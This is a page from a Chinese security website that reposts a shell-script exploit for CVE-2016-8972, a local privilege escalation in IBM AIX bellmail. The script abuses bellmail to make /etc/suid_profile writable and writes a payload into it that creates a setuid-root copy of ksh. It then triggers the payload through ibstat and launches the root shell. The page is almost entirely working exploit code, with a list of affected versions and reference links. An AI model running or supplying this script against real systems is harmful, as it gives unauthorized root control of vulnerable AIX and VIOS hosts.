首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation 来源：https://www.rhinosecuritylabs.com 作者：Monsegur 发布时间：2016-12-23   #!/usr/bin/sh # # CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root # # Affected versions: # AIX 6.1, 7.1, 7.2 # VIOS 2.2.x # #         Fileset                Lower Level  Upper Level KEY #        --------------------------------------------------------- #        bos.net.tcp.client       6.1.9.0      6.1.9.200   key_w_fs #        bos.net.tcp.client       7.1.3.0      7.1.3.47    key_w_fs #        bos.net.tcp.client       7.1.4.0      7.1.4.30    key_w_fs #        bos.net.tcp.client_core  7.2.0.0      7.2.0.1     key_w_fs #        bos.net.tcp.client_core  7.2.1.0      7.2.1.0     key_w_fs # # Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc # Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/ # @hxmonsegur //RSL - https://www.rhinosecuritylabs.com   ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') VULNBIN=/usr/bin/bellmail SUIDPROFILE=/etc/suid_profile   function ESCALATE {     echo "[*] Preparing escalation"       $VULNBIN >/dev/null 2>&1 <<EOD s /etc/suid_profile EOD       if [ ! -w $SUIDPROFILE ]; then         echo "[-] $SUIDPROFILE is not writable. Exploit failed."         exit 1     fi       echo "[*] Clearing out $SUIDPROFILE"     echo > /etc/suid_profile       echo "[*] Injecting payload"     cat << EOF >$SUIDPROFILE cp /bin/ksh $ROOTSHELL /usr/bin/syscall setreuid 0 0 chown root:system $ROOTSHELL chmod 6755 $ROOTSHELL rm -f $SUIDPROFILE EOF       echo "[*] Executing SUID to leverage privileges"     /usr/bin/ibstat -a >/dev/null 2>&1       if [ ! -x $ROOTSHELL ]; then         echo "[-] Root shell does not exist or is not executable. Exploit failed."         exit 1     fi       echo "[*] Escalating to root.."     $ROOTSHELL     echo "[*] Make sure to remove $ROOTSHELL" }   echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"   $VULNBIN -e if [ $? -eq 0 ]     then         ESCALATE         echo "[*] Make sure to remove $ROOTSHELL"         exit 0 fi   echo "[*] Sending mail to non-existent user, force a bounce within ~minute" /usr/bin/mail nonexistentuser <<EOD . . . EOD   echo "[*] Waiting for mail to come in."   while true do     $VULNBIN -e     if [ $? -eq 0 ]         then             echo "[*] Mail found"             ESCALATE             break         else             echo "[-] Mail not received yet. Sleeping."             sleep 10         fi done   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·at(1) Persistence Module ·macOS 10.12.1 Kernel - Writabl ·NETGEAR WNR2000v5 - Remote Cod ·Vesta Control Panel 0.9.8-16 - ·Microsoft Edge - International ·macOS 10.12 - Double vm_deallo ·Microsoft Edge - SIMD.toLocale ·macOS < 10.12.2 / iOS < 10.2 K ·Microsoft Internet Explorer 11 ·macOS < 10.12.2 / iOS < 10.2 - ·Google Chrome < 31.0.1650.48 - ·macOS 10.12.1 / iOS < 10.2 - p   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved